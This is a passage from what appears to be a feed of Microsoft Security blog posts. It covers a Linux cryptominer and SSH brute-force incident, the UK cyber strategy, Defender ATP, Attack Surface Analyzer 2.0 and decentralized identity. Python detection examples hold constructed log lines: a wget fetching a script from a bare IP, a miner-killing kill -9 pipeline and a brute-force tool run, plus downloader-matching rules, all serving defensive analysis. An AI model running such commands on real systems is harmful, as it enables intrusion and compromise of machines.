Let’s talk more about what this command does. ps auxf shows every process in a tree view (parent and child). The first grep removes the grep processes themselves from that list and the second grep keeps only lines mentioning xmrig (a well-known miner). awk prints the second column of each remaining line, which is the PID, and xargs passes those PIDs to kill -9, which sends SIGKILL.

What follows next is a series of pkill commands that kill processes using a couple of techniques:

  1. Match the entire process and argument list pattern.
  2. Forcefully terminate a process.

To get maximum CPU usage and efficiency, attackers generally kill any existing coin-miner instances and focus on deploying their own mining payload.

Generally, after this activity, traces of a cryptocurrency wallet or other mining-related activity become evident, but what followed next was a surprise.
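The host behaviour described so far (a download from a bare-IP host, staging under a dot-directory in /tmp, killing competing miners, a time-boxed run from that directory) is the kind of thing a detection rule can catch from process-creation telemetry. Here is an added example, not Azure Security Center’s analytics, that runs three such rules over six constructed log lines modelled on the incident and then groups the resulting alerts into one incident per process tree, which is the idea behind the alert correlation mentioned in the recommendations below. The log lines, PIDs and the second miner name are made up for illustration.

```python
"""Detection logic for the host behaviour described above, run over constructed
process-creation records.

Added example; this is not Azure Security Center's analytics. The six log lines
are made up to mirror the incident: a download from a bare-IP host, staging
under a dot-directory in /tmp, killing competing miners, and a time-boxed run
of the brute-force tool. Fields: timestamp, user, ppid, pid, cwd, command line.
"""
import re

SAMPLE_LOG = """\
2019-04-10T02:11:03Z root 1432 1440 /root /bin/bash -c "wget -q http://203.0.113.5/x.sh -O /tmp/x.sh"
2019-04-10T02:11:09Z root 1440 1451 /tmp /bin/tar -xzf /tmp/dota.tar.gz -C /tmp/.mountfs
2019-04-10T02:11:15Z root 1440 1460 /tmp/.mountfs/.rsync /bin/bash -c "ps auxf|grep -v grep|grep xmrig|awk '{print $2}'|xargs kill -9"
2019-04-10T02:11:16Z root 1440 1461 /tmp/.mountfs/.rsync /usr/bin/pkill -9 -f minerd
2019-04-10T02:12:01Z root 1440 1470 /tmp/.mountfs/.rsync /usr/bin/timeout 90m ./tsm64 -f ip -p p
2019-04-10T02:30:00Z www-data 900 1500 /var/www /usr/bin/php -f cron.php
"""

HIDDEN_TMP = re.compile(r"/tmp/\.[^/\s]+")          # dot-directories directly under /tmp
BARE_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")
DOWNLOADER = re.compile(r"\b(?:wget|curl)\b")
KILLER = re.compile(r"\b(?:kill -9|pkill|killall)\b")
MINERS = ("xmrig", "minerd")                        # xmrig is from the incident; minerd is illustrative


def parse(log_text):
    events = []
    for line in log_text.strip().splitlines():
        ts, user, ppid, pid, cwd, cmd = line.split(None, 5)
        events.append({"ts": ts, "user": user, "ppid": int(ppid), "pid": int(pid), "cwd": cwd, "cmd": cmd})
    return events


def evaluate(event):
    """Return the rule names that fire for one process-creation event."""
    cmd, cwd = event["cmd"], event["cwd"]
    hits = []
    if DOWNLOADER.search(cmd) and BARE_IP_URL.search(cmd):
        hits.append("download_from_bare_ip")
    if HIDDEN_TMP.search(cwd) or HIDDEN_TMP.search(cmd):
        hits.append("hidden_tmp_dir")
    if KILLER.search(cmd) and any(m in cmd for m in MINERS):
        hits.append("kills_competing_miner")
    return hits


def root_pid(pid, parents):
    """Walk ppid links up to the oldest ancestor seen in the log."""
    seen = set()
    while pid in parents and pid not in seen:
        seen.add(pid)
        pid = parents[pid]
    return pid


def analyze(log_text):
    """Map root ancestor pid -> list of (pid, rule) alerts: one incident per process tree."""
    events = parse(log_text)
    parents = {e["pid"]: e["ppid"] for e in events}
    incidents = {}
    for e in events:
        for rule in evaluate(e):
            incidents.setdefault(root_pid(e["pid"], parents), []).append((e["pid"], rule))
    return incidents


if __name__ == "__main__":
    for root, alerts in analyze(SAMPLE_LOG).items():
        print(f"incident rooted at pid {root}: {len(alerts)} alerts")
        for pid, rule in alerts:
            print(f"  pid {pid}: {rule}")
```

Any one of these rules fires on benign activity now and then (developers download from IP literals, admins kill runaway processes); what makes the signal strong is several of them firing under one parent shell, which is why the grouping step matters as much as the rules.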

It turns out that this machine appeared to have been used to target 20,000 different endpoints based on our timeline of attack analysis detailed below:

Azure Security Center caught most of the suspicious activities observed above that triggered security alerts. To further our investigation, we collaborated with our internal memory forensics team. The analysis of the ELF payload unfolded even more details in this attack campaign:

  • The payload had three important components:
    • tsm64: An ELF executable.
    • Libraries that tsm64 relied on for execution.
    • tsm: Code used to launch the tsm64 executable.
  • To ensure that the payload could run on most distributions, the attackers supplied the shared libraries that tsm64 depends on, rather than relying on whatever the host had installed.
  • tsm: tsm is a renamed copy of a helper program that loads the shared libraries needed by the program executable, prepares the program to run, and then runs it.
  • Dependent libraries: The dependency analysis of the tsm64 executable showed that it needed four shared libraries at runtime.
  • tsm64: This is the executable that the attacker eventually wants to run. Turns out, tsm64 is a multi-threaded SSH brute force tool that can attack a set of IP’s with provided passwords.
  • The analysis of the Procedure Linkage Table (PLT) for tsm64 showed multi-threading, network communication, and password-file reading capabilities. A subset of the imported system APIs is listed below:
    • Networking: setsockopt, getsockopt, getsockname, connect, gethostname, socket, inet_ntoa, recvfrom, recv, bind, getaddrinfo, inet_pton, getpeername
    • Multi-threaded (pthread): pthread_getspecific, pthread_setspecific, pthread_cond_signal, pthread_mutex_init, pthread_create, pthread_cond_init, pthread_key_delete, pthread_self, pthread_join, pthread_equal, pthread_cond_wait, pthread_detach, pthread_once, pthread_mutex_lock, pthread_key_create, pthread_mutex_destroy, pthread_cond_broadcast, pthread_mutex_unlock, pthread_kill
    • Password file entry: getpwnam, getpwnam_r, getpwuid_r
  • The IP address list and user credentials to be used for the brute-force attack were downloaded into innocuous-sounding files named ‘a’ and ‘b’. File ‘a’ contained a list of 20,000 different IP addresses while file ‘b’ held a list of credentials. These files were later renamed to ‘ip’ and ‘p’ respectively and passed to tsm64.
  • Using the standard timeout utility, the tool was run with a maximum lifetime of 90 minutes.

Adversaries are always finding new and novel ways to evade detection. As cyber defenders, we need to constantly innovate and track these latest threats in order to thwart new and deceptive attacks that are making rounds in the cloud cyber world.

Recommended actions

  • Azure Security Center can automatically correlate such multiple triggered alerts into a single security incident. This capability provides a single overview of any attack campaign and all the related alerts to understand the action attackers took and what resources were impacted.
  • While Azure Security Center alerted on the activity, the intrusion could have been prevented through good password hygiene: the entry point was an SSH password guessed by brute force. Use passwords and passphrases that are not easily guessed, or better, use key-based SSH authentication and disable password authentication for SSH altogether. Some of our previous blogs cover this topic: Just In Time (JIT), Password-less sign-in, and Azure Key Vault.
  • Azure Security Center alerts can also be integrated into an existing SIEM solution for a centralized view of security posture across your organization, or with Microsoft’s new SIEM, Azure Sentinel.

Learn more

To learn more about the Azure Security Center, see the following:

The post Uncovering Linux based cyberattack using Azure Security Center appeared first on Microsoft Security.

UK launches cyberstrategy with long-term relevance

Like most major global economies, the United Kingdom continues to place cybersecurity issues front and center. The National Cyber Security Strategy: 2016-2021 document—published by the UK Government and released nearly two years ago—describes the plan to make the UK secure and resilient in cyberspace. It’s the most frequently referenced document and project in any cybersecurity discussion. After two years, and with recent updates, it’s worthwhile to revisit the document to assess its importance in securing digital transformation across the UK’s economy. Moreover, the National Security Capability Review (NSCR) March 2018 update to the National Cyber Security Strategy makes the timing for a review of this all the more relevant, as the 80-page document is well-written, thorough, and remains useful and relevant. The cyberstrategy’s core pillars—defend, deter, and develop—are described in detail and address a wide array of important topics, including education, international cooperation, and public-private collaboration.

Specifically, the cybersecurity document does an excellent job in the following areas:

  • Insider threats—This type of threat is highlighted throughout the document; something that is not always emphasized sufficiently. For example, “Insider threats remain a cyber risk to organizations in the UK. Malicious insiders, who are trusted employees of an organization and have access to critical systems and data, pose the greatest threat.” We continue to hear about this problem from customers in nearly all industries and in all countries. This bold and clear statement makes it clear that this problem is front and center for the UK strategy, as it should be.
  • Public incidents—It’s refreshing to see major incidents that impact companies and organizations in the UK highlighted rather than hidden from public view. The document includes several incidents, such as the 2015 TalkTalk breach, and the 2016 attack on the Society for Worldwide Interbank Financial Telecommunication (SWIFT) payment system in Bangladesh, the Philippines, and the Ukrainian power grid incident. While these incidents did not all occur on UK soil or directly to UK organizations, their impact was still felt in the UK.
  • Diversity and inclusion—The UK is committed to increasing diversity while also addressing its cybersecurity skills shortage. The document states emphatically that “we will address the gender imbalance in cyber-focused professions, and reach people from more diverse backgrounds to make sure we are drawing from the widest available talent pool.” The need is so acute that cybersecurity has become an attractive field for younger professionals to start a career in, even if that is not yet widely known.
  • Public-private collaboration—Cybersecurity is a “team sport” and working together across private and public sectors is essential. Openly admitting this and accepting government responsibility is a key tenet of this strategy, described as, “Government has a clear leadership role, but we will also foster a wider commercial ecosystem, recognizing where industry can innovate faster than us.” The document also states, “We will set out more clearly the respective roles of government and industry, including how these might evolve over time.”

As we look at other areas that the strategy may wish to consider expanding into or elaborating upon in the coming years, three specific areas come to mind:

  • Links to money laundering and terrorist financing—While the initial 2016 version did not mention how the flow of money impacts and funds cybercrime, the NSCR March 2018 update did, with three specific references to money laundering and terrorist financing, explaining, “We will take a whole-of-government approach including with the Devolved Administrations to tackle serious and organized crime and publish an updated Serious and Organized Crime Strategy in 2018.” It also stated, “We remain a leading player in developing and applying economic sanctions [… and will] … continue using sanctions smartly to deliver national security outcomes after we have left the EU.”
  • Returning military veterans—Whether it be from armed conflicts or peace-keeping missions or other such activities, one way the UK could shrink the gap in cybersecurity skills would be to help military veterans transition into this field. The strategy states, “This skills gap represents a national vulnerability that must be resolved.” To that end, there are multiple paths that other countries have pursued that could be applied here.
  • Cloud computing—The terms “cloud” and “cloud computing” are not mentioned in the original 2016 strategy document or in the NSCR March 2018 update. Cloud-based security offerings are a mainstay of any cybersecurity strategy and bring with them enormous benefits, speed, operational efficiencies, and more.

Looking ahead, it is inspiring to see that in the NSCR March 2018 update to the National Cyber Security Strategy there is a real commitment to maintaining the course with the original 2016 strategy. The 2018 update states quite openly that “the NSCR cyber project confirms that our overarching strategic objectives still stand” and “We will continue to implement the National Cyber Security Strategy and ensure it keeps pace with the threat.”

Clearly the UK will stay the course with its original cybersecurity strategy with additional changes and enhancements. Moreover, with all eyes on the UK transition out of the EU, it’s important to demonstrate to the world community that cybersecurity strategy can not only exist but in fact can thrive even amid a massive overhaul in international geopolitics.

The post UK launches cyberstrategy with long-term relevance appeared first on Microsoft Security.

Step 9. Protect your OS: top 10 actions to secure your environment

In “Step 9. Protect your OS” of the Top 10 actions to secure your environment blog series, we provide resources to help you configure Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) to defend your Windows, macOS, Linux, iOS, and Android devices from advanced threats.

In an advanced threat, hackers and cybercriminals infiltrate your network through compromised users or vulnerable endpoints and can stay undetected for weeks—or even months—while they attempt to exfiltrate data and move laterally to gain more privileges. Microsoft Defender ATP helps you detect these threats early and take action immediately.

Enabling Microsoft Defender ATP and related products will help you:

  • Mitigate vulnerabilities.
  • Reduce your attack surface.
  • Enable next generation protection from the most advanced attacks.
  • Detect endpoint attacks in real-time and respond immediately.
  • Automate investigation and remediation.

Threat & Vulnerability Management

Threat & Vulnerability Management is a new component of Microsoft Defender ATP that provides:

  • Real-time endpoint detection and response (EDR) insights correlated with endpoint vulnerabilities.
  • Linked machine vulnerability and security configuration assessment data in the context of exposure discovery.
  • Built-in remediation processes through Microsoft Intune and Microsoft System Center Configuration Manager.

To use Threat & Vulnerability Management, you’ll need to turn on the Microsoft Defender ATP preview features.

Attack surface reduction

Attack surface reduction limits the number of attack vectors that a malicious actor can use to gain entry. You can configure attack surface reduction through the following:

  • Microsoft Intune
  • System Center Configuration Manager
  • Group Policy
  • PowerShell cmdlets

Enable these capabilities to reduce your attack surface:

  • Hardware-based isolation: Configure Microsoft Defender Application Guard to protect your company while your employees browse the internet. You define which websites, cloud resources, and internal networks are trusted; everything not on your list is considered untrusted and is opened in an isolated container.
  • Application control: Restrict the applications that your users can run and require that applications earn trust in order to run.
  • Device control: Configure Windows 10 hardware and software to “lock down” Windows systems so they operate with properties of mobile devices. Use configurable code integrity to restrict devices to only run authorized apps.
  • Exploit protection: Configure Microsoft Defender Exploit Guard to manage and reduce the attack surface of apps used by your employees.
  • Network protection: Use network protection to prevent employees from using an application to access dangerous domains that may host phishing scams, exploits, and other malicious content.
  • Controlled folder access: Prevent apps that Microsoft Defender Antivirus determines are malicious or suspicious from making changes to files in protected folders.
  • Network firewall: Block unauthorized network traffic from flowing into or out of the local device.
  • Attack surface reduction rules: Prevent actions and apps that are typically used by exploit-seeking malware to infect machines.

Next generation protection

The Intelligent Security Graph powers the antivirus capabilities of Microsoft Defender Antivirus, which works with Microsoft Defender ATP to protect desktops, laptops, and servers from the most advanced ransomware, fileless malware, and other types of attacks.

Configure Microsoft Defender Antivirus capabilities to:

  • Enable cloud-delivered protection: Leverage artificial intelligence (AI) and machine learning algorithms to analyze the billions of signals on the Intelligent Security Graph and identify and block attacks within seconds.
  • Specify the cloud-delivered protection level: Define the amount of information to be shared with the cloud and how aggressively new files are blocked.
  • Configure and validate network connections for Microsoft Defender Antivirus: Configure firewall or network filtering rules to allow the required URLs.
  • Configure the block at first sight feature: Block new malware within seconds.

Endpoint detection and response

Microsoft Defender ATP endpoint detection and response capabilities detect advanced attacks in real time and give you the power to respond immediately. Microsoft Defender ATP correlates alerts and aggregates them into an incident, so you can understand cross-entity attacks (Figure 1).

Alerts are grouped into an incident based on these criteria:

  • Automated investigation triggered the linked alert while investigating the original alert.
  • File characteristics associated with the alert are similar.
  • Manual association by a user to link the alerts.
  • Proximate time of alerts triggered on the same machine falls within a certain timeframe.
  • Same file is associated with different alerts.
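To show how those criteria turn a flat alert queue into incidents, here is an added example (not Microsoft Defender ATP’s implementation) that applies three of the five: an explicit link from a manual association or an automated investigation, the same file hash behind two alerts, and alerts on the same machine within a time window. The alerts, the machine names and the 60-minute window are assumptions made up for illustration; “similar file characteristics” is not modelled because it needs a similarity metric the post does not describe.

```python
"""Group alerts into incidents using the criteria listed above.

Added example; not Microsoft Defender ATP's implementation. Three of the five
criteria are modelled: an explicit link (manual or from an automated
investigation), the same file hash, and alerts on the same machine within a
time window. The 60-minute window and the alert data are assumptions made up
for illustration; "similar file characteristics" is not modelled.
"""
from datetime import datetime, timedelta

ALERTS = [
    {"id": "A1", "machine": "pc-01", "time": "2019-05-01T09:00:00", "sha256": "aaa"},
    {"id": "A2", "machine": "pc-01", "time": "2019-05-01T09:20:00", "sha256": "bbb"},
    {"id": "A3", "machine": "pc-07", "time": "2019-05-02T14:00:00", "sha256": "aaa"},
    {"id": "A4", "machine": "pc-07", "time": "2019-05-03T10:00:00", "sha256": "ccc"},
    {"id": "A5", "machine": "srv-02", "time": "2019-05-03T10:05:00", "sha256": "ddd", "links": ["A4"]},
    {"id": "A6", "machine": "pc-09", "time": "2019-05-04T08:00:00", "sha256": "eee"},
]


class DisjointSet:
    """Union-find: every alert starts alone; each criterion that matches merges two sets."""

    def __init__(self, items):
        self.parent = {i: i for i in items}

    def find(self, i):
        while self.parent[i] != i:
            self.parent[i] = self.parent[self.parent[i]]  # path halving
            i = self.parent[i]
        return i

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def incidents(alerts, window_minutes=60):
    """Return incidents as sorted lists of alert ids, one list per incident."""
    window = timedelta(minutes=window_minutes)
    by_id = {a["id"]: a for a in alerts}
    when = {a["id"]: datetime.fromisoformat(a["time"]) for a in alerts}
    ds = DisjointSet(by_id)
    for i, a in enumerate(alerts):
        for linked in a.get("links", []):          # manual or automated-investigation link
            if linked in by_id:
                ds.union(a["id"], linked)
        for b in alerts[i + 1:]:
            if a["sha256"] == b["sha256"]:         # same file behind both alerts
                ds.union(a["id"], b["id"])
            elif a["machine"] == b["machine"] and abs(when[a["id"]] - when[b["id"]]) <= window:
                ds.union(a["id"], b["id"])         # same machine, close in time
    groups = {}
    for i in by_id:
        groups.setdefault(ds.find(i), []).append(i)
    return sorted(sorted(g) for g in groups.values())


if __name__ == "__main__":
    for n, group in enumerate(incidents(ALERTS), 1):
        print(f"Incident {n}: {', '.join(group)}")
```

Note the transitivity: A3 shares a file with A1, and A1 shares a machine and time with A2, so all three land in one incident even though A2 and A3 have nothing in common directly. That is what lets a single incident span machines, and also why a noisy correlation criterion can over-merge.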


Figure 1. Microsoft Defender ATP correlates alerts and aggregate them into incidents.

Review your alerts and incidents on the security operations dashboard. You can customize and filter the incident queue to help you focus on what matters most to your organization (Figure 2). You can also customize the alert queue view and the machine alerts view to make it easier for you to manage.


Figure 2. Default incident queue displays incidents seen in the last 30 days, with the most recent incident showing at the top of the list.

Once you detect an attack that requires remediation, you can take the following actions:

Auto investigation and remediation

Microsoft Defender ATP can be configured to automatically investigate and remediate alerts (Figure 3), which will reduce the number of alerts your Security Operations team will need to investigate manually.


Figure 3. You can view the details of an automated investigation to see information such as the investigation graph, alerts associated with the investigation, the machine that was investigated, and other information.

Create and manage machine groups in Microsoft Defender ATP to define automation levels:

  • Not protected: Machines will not get any automated investigations run on them.
  • Semi – require approval for any remediation: This is the default automation level. An approval is needed for any remediation action.
  • Semi – require approval for non-temp folders remediation: An approval is required on files or executables that are not in temporary folders. Files or executables in temporary folders, such as the user’s download folder or the user’s temp folder, will automatically be remediated if needed.
  • Semi – require approval for core folders remediation: An approval is required on files or executables that are in operating system directories such as the Windows folder and the Program Files folder. Files or executables in all other folders will automatically be remediated if needed.
  • Full – remediate threats automatically: All remediation actions will be performed automatically.

Microsoft Threat Experts

Microsoft Threat Experts is a new, managed threat hunting service that provides proactive hunting, prioritization, and additional context and insights that further empower security operations centers (SOCs) to identify and respond to threats quickly and accurately with two capabilities:

  1. Targeted attack notifications—Alerts that are tailored to organizations provide as much information as can be quickly delivered to bring attention to critical network threats, including the timeline, scope of breach, and the methods of intrusion.
  2. Experts on demand—When a threat exceeds your SOC’s capability to investigate, or when more actionable information is needed, security experts provide technical consultation on relevant detections and adversaries. In cases where a full incident response becomes necessary, seamless transition to Microsoft incident response services is available.

Microsoft Defender ATP customers can register for Microsoft Threat Experts and we will reach out to notify you via email when you’ve been selected.

Learn more

Check back in a few weeks for our final blog post in the series, “Step 10. Detect and investigate security threats,” which will give you tips to deploy Azure Advanced Threat Protection to detect suspicious activity in real-time.


The post Step 9. Protect your OS: top 10 actions to secure your environment appeared first on Microsoft Security.

Announcing the all new Attack Surface Analyzer 2.0

Few of us know what is really happening on our systems when we install new software from new or untrusted sources. This is important because most installation processes require elevated privileges, which can lead to undesired system configuration changes. Knowing what changes have been made is vital to maintaining the security of your system, data, and networks. Identifying those changes can be challenging and time consuming without a little help.

The classic Attack Surface Analyzer 1.0 was released in 2012 to help software developers and IT professionals identify changes made to Windows operating systems during application installations. This year, we decided to rewrite the tool to take advantage of modern, cross-platform technologies like .NET Core and Electron. Attack Surface Analyzer 2.0 now runs on Windows, Linux, and macOS and is available as an open source project on GitHub.

Attack Surface Analyzer 2.0 can help you identify potential security risks introduced by changes to an operating system’s security configuration by identifying changes in key areas, including:

  • File System
  • User Accounts
  • System Services
  • Network Ports (listeners)
  • System Certificate Stores
  • Windows Registry

This tool can play an important role in ensuring that the software you develop or deploy doesn’t adversely affect the operating system security configuration by allowing you to scan for specific types of changes.

Results from the comparison analysis feature highlight relevant changes, which can be easily viewed or exported.

The tool includes both Electron and command line interface options. Results for the command line use option are written to a local HTML or JSON file, making it easy to include as part of your automated toolchain.

Detecting these types of changes can be error prone and time consuming. Attack Surface Analyzer 2.0 helps make it easy.
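The comparison the tool performs is a snapshot diff: fingerprint the key areas before an installation, fingerprint them again afterwards, and report what was added, removed or modified. The block below is an added example of that technique, written for this page and not taken from the Attack Surface Analyzer project. Only the file-system collector is real; the other areas (listening ports, user accounts, services) are passed in as ready-made dictionaries, so one comparison routine serves every area. Permission bits are part of the file fingerprint so that a chmod shows up even when content is unchanged.

```python
"""Baseline-vs-after-install comparison in the spirit of Attack Surface Analyzer.

Added example, not code from the Attack Surface Analyzer project. Only the
file-system collector is implemented; the other areas (ports, users,
services, certificates) are supplied as {key: fingerprint} dictionaries
so a single comparison routine serves every area.
"""
import hashlib
import json
import os
import stat
from typing import Any, Dict, List

Area = Dict[str, Any]        # key (path, port, account ...) -> fingerprint
Snapshot = Dict[str, Area]   # area name -> Area


def snapshot_tree(root: str) -> Area:
    """Fingerprint every regular file under root: sha256 plus permission bits.

    Mode bits are part of the fingerprint so a chmod (new setuid bit,
    world-writable file) is reported even when the content is unchanged.
    """
    entries: Area = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):   # skip symlinks, sockets, devices
                continue
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    digest.update(chunk)
            entries[os.path.relpath(path, root)] = {
                "sha256": digest.hexdigest(),
                "mode": oct(stat.S_IMODE(st.st_mode)),
            }
    return entries


def compare(before: Snapshot, after: Snapshot) -> Dict[str, Dict[str, Any]]:
    """Per area, return what was added, removed or modified between two snapshots."""
    report: Dict[str, Dict[str, Any]] = {}
    for area in sorted(set(before) | set(after)):
        b, a = before.get(area, {}), after.get(area, {})
        added = {k: a[k] for k in a.keys() - b.keys()}
        removed = {k: b[k] for k in b.keys() - a.keys()}
        modified = {k: {"before": b[k], "after": a[k]}
                    for k in a.keys() & b.keys() if a[k] != b[k]}
        if added or removed or modified:
            report[area] = {"added": added, "removed": removed, "modified": modified}
    return report


def risky_findings(report: Dict[str, Dict[str, Any]]) -> List[str]:
    """Pull out the changes an installer should rarely need: new listeners,
    new accounts and services, permission changes and new setuid files."""
    findings: List[str] = []
    for port, owner in report.get("ports", {}).get("added", {}).items():
        findings.append(f"new listener {port} ({owner})")
    for name in report.get("users", {}).get("added", {}):
        findings.append(f"new user account {name}")
    for name in report.get("services", {}).get("added", {}):
        findings.append(f"new service {name}")
    files = report.get("files", {})
    for path, change in files.get("modified", {}).items():
        if change["before"]["mode"] != change["after"]["mode"]:
            findings.append(f"permission change on {path}: "
                            f"{change['before']['mode']} -> {change['after']['mode']}")
    for path, info in files.get("added", {}).items():
        if int(info["mode"], 8) & stat.S_ISUID:
            findings.append(f"new setuid file {path}")
    return findings


def to_json(report: Dict[str, Dict[str, Any]]) -> str:
    """Same idea as the CLI's JSON export: hand it to a toolchain or archive it."""
    return json.dumps(report, indent=2, sort_keys=True)


if __name__ == "__main__":
    # Constructed demo: the "ports" and "users" areas are hand-written, not collected.
    before = {"files": snapshot_tree("."), "ports": {"tcp/22": "sshd"}, "users": {"root": "0"}}
    after = {"files": snapshot_tree("."), "ports": {"tcp/22": "sshd", "tcp/8080": "updater"},
             "users": {"root": "0", "svc_updater": "1001"}}
    rep = compare(before, after)
    print(to_json(rep))
    print("\n".join(risky_findings(rep)))
```

Run the collector once before the installer and once after, persist both snapshots as JSON, and keep the "before" file somewhere the installer cannot write; a pipeline can then fail the build when `risky_findings` returns anything it did not expect.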

We look forward to your comments, ideas, and contributions for improving this tool. To learn more about Attack Surface Analyzer 2.0, please visit our GitHub project page at

The post Announcing the all new Attack Surface Analyzer 2.0 appeared first on Microsoft Security.

Decentralized identity and the path to digital privacy

Security is the central challenge of the digital age. Our digital lives have moved into the cloud. People now use multiple devices to connect to multiple applications through many different networks. Just about everything is connected to the internet, where threats remain constant and evolving. In this distributed, heterogeneous environment, however, there’s still only one “you.” That’s why identity is the best path to security.

The identity technologies my team at Microsoft builds serve as the frontline of our enterprise-class security solutions. Whether it’s a customer using biometrics to log in with Windows Hello, or enterprises relying on us to deliver risk-based conditional access through Azure Active Directory, identity is the front door to our customers’ content and experiences.

Identity can also be a key enabler to something that’s as important to our customers as security—privacy. With identity as the control plane, we’ve made security solutions more sophisticated, which is a good thing for both organizations and individuals. But when it comes to privacy, the needs of individuals and organizations are still out of balance. This week, I’m in Munich, Germany, at the European Identity and Cloud Conference to talk about how mechanisms like decentralized identity can help us address this imbalance.

Joy Chik speaking at the European Identity and Cloud Conference in Munich, Germany

Anyone who reads the news knows that many individuals feel organizations have way too much control over their personal information. Organizations are rightfully being asked to take more responsibility for protecting the information of their customers. Even the best security isn’t enough, however, if we don’t give people greater control and privacy as well.

That control begins with identity, because in your digital life, everything starts with you. Your identity is who you are. It’s everything you say, do, and experience in your everyday life. Identity can provide the same control plane for privacy that it has for security.

At Microsoft, we envision a world where technology facilitates respect for privacy. In this world, organizations no longer need to issue new identities. Instead, they embrace the digital identities that individuals bring with them. Each person’s digital identity belongs to them. They control it.

In this world, organizations are more intentional about the type of data they collect, how much they collect, where it comes from, and where it is stored. They accept information from individuals that an independent authority has verified, like citizenship verified by a government agency or education level verified by a university. Using verifiable credentials or claims that are digital, individuals can prove who they are, and they can exchange digital information, or what they are, with each organization. In other words, individuals and organizations can establish a mutual trust relationship.

Verifiable information is stored with the individual. The organization doesn’t have to collect or protect this sensitive information—less liability for them, and more control for the individual. When people control their own identity, they can set constraints and control their digital data, sharing only the information necessary to conduct business with organizations, and no more.

Organizations, for their part, can decide to store information with individuals rather than storing it themselves. This allows them to collaborate with anyone, confident that the information exchanged can be trusted, while reducing their liability and improving compliance. The individual, in essence, becomes a data controller. This changes the relationship—and the balance of power—with organizations.

We’re already seeing industry support for this paradigm shift, spearheaded by the work the Decentralized Identity Foundation (DIF) is doing. Microsoft, along with other companies, is contributing open source code to DIF so developers can take advantage of decentralized identities. Soon, DIF will have everything necessary for individuals and organizations to start using them. We’re working with the community to build support for decentralized identity into the Microsoft platform so we can enable innovation, and so we can bring individuals and organizations together for stronger security and privacy.

As part of our goal to empower everyone with a self-owned identity, we’re contributing technologies to a system that can support all kinds of entities, including millions of organizations, billions of people, and trillions of devices. One example of this is our collaboration with members of DIF, notably ConsenSys and Transmute, to develop a blockchain-agnostic protocol for creating scalable DID networks, called Sidetree.

As part of that collaboration, earlier this week we announced an early preview of a Sidetree-based DID network that runs atop the Bitcoin blockchain, called ION (Identity Overlay Network). ION is designed to deliver the scale required for a world of DIDs, while inheriting and preserving the attributes of decentralization present in the Bitcoin blockchain. As with previously announced efforts, we’re sharing our work as early as possible, rough edges and all, to start a conversation with the community and encourage further collaboration.

These examples are only the beginning of our efforts to champion digital privacy through identity. The privacy conversation requires constant engagement and collaboration. In addition to industry partners, we’re calling on organizations everywhere to join us in this effort:

  • Instead of issuing new digital identities for external parties like partners and customers, accept existing ones that users bring.
  • Limit the data you’re collecting to only what’s necessary and accept independently verified information from individuals.
  • Based on your business model, decide where you will balance control over data between your organization and the individuals who do business with you.

Privacy is a human right. To protect that right, individuals must be empowered to control their own digital identities. Many members of the identity community, including Microsoft, are committed to making this real.

The post Decentralized identity and the path to digital privacy appeared first on Microsoft Security.

Executing on the vision of Microsoft Threat Protection

Over the last several months, we’ve provided regular updates on the rapid progress we’re making with Microsoft Threat Protection, which enables your organization to:

  • Protect your assets with identity-driven security and powerful conditional access policies which ensure your assets are secured from unauthorized users, devices, or apps.
  • Connect the dots between disparate threat signals and develop threat incidents by grouping alerts from different parts of your environment, stitching together the elements of a threat.
  • Empower your defenders, providing in-depth analysis to identify the full scope and impact of a threat.

We support these capabilities by offering you intelligent automation as well as human expertise to quickly resolve situations and keep your business running. I recently shared our vision of Microsoft Threat Protection with Jeremy Chapman in a Microsoft Mechanics video broadcast:

We strongly believe in our vision and are confident our customers will benefit from enhanced security with Microsoft Threat Protection as we continue adding capabilities with unstoppable momentum. Today, I want to spend time highlighting what Microsoft Threat Protection can already do for you. While we’re very excited about the vision and pushing towards releasing more features, it’s important to share the significant advantages which are already available with Microsoft Threat Protection today. I’m going to use a real example of a common, yet lethal, threat type to showcase how Microsoft Threat Protection already makes your organization more secure.

Executing on our vision

The more threats we see, the more we can stop. This virtuous cycle means that each threat we see helps further enhance our machine learning models, which in turn improves our ability to stop subsequent threats. As we’ve shared in the past, the Microsoft Intelligent Security Graph (Figure 1) enables us to see billions of threats and assess 6.5 trillion signals daily. Importantly, we don’t only see a large quantity of threats, but we also see threats from a wide variety of sources. Through the Intelligent Security Graph, threat signals are seamlessly shared across all the services in Microsoft Threat Protection, providing comprehensive security across multiple attack vectors.

Infographic of the strength of signal offered by the Microsoft Intelligent Security Graph.

Figure 1. The strength of signal offered by the Microsoft Intelligent Security Graph.

A great example of how Microsoft Threat Protection is already executing on its promised vision is how we address phishing campaigns. Phishing has been on a steady rise over the last few years. As the provider of one of the largest email services on the planet, we expect to be a primary target for attacks. In 2018 alone, Microsoft’s analysts analyzed (Figure 2) over 300,000 phishing campaigns and 8 million business email compromise (BEC) attempts.

Infographic showing data from Office 365 security analysts on the phishing campaigns and BEC attempts from 2018.

Figure 2. Data from Office 365 security analysts on the phishing campaigns and BEC attempts from 2018.

While these numbers can be worrisome, Microsoft Threat Protection is designed to secure your organization from phishing, whether the campaign attacks the endpoint, email, or the web. In a recent campaign, anomaly detection algorithms in Microsoft Defender Advanced Threat Protection (ATP) next-generation protection flagged multiple PDF files that, at the time, only Microsoft was detecting. That was possible because the detection drew on knowledge from multiple security services operating on different attack vectors. In this example, the malicious PDF files (Figure 3) were blocked by machine learning models that assimilate signals from multiple services of Microsoft Threat Protection.

Image of one of several PDF files that only Microsoft was detecting (as Trojan:PDF/Sonbokli.A!cl) at the time it was first observed (Source: VirusTotal).

Figure 3. One of several PDF files that only Microsoft was detecting (as Trojan:PDF/Sonbokli.A!cl) at the time it was first observed (Source: VirusTotal).

Through the Microsoft Intelligent Security Graph, the detection algorithm was enriched with URL and domain reputation intelligence from Microsoft Defender SmartScreen, the service powering the anti-phishing technology in Microsoft Edge, as well as the network protection capability in Microsoft Defender ATP.

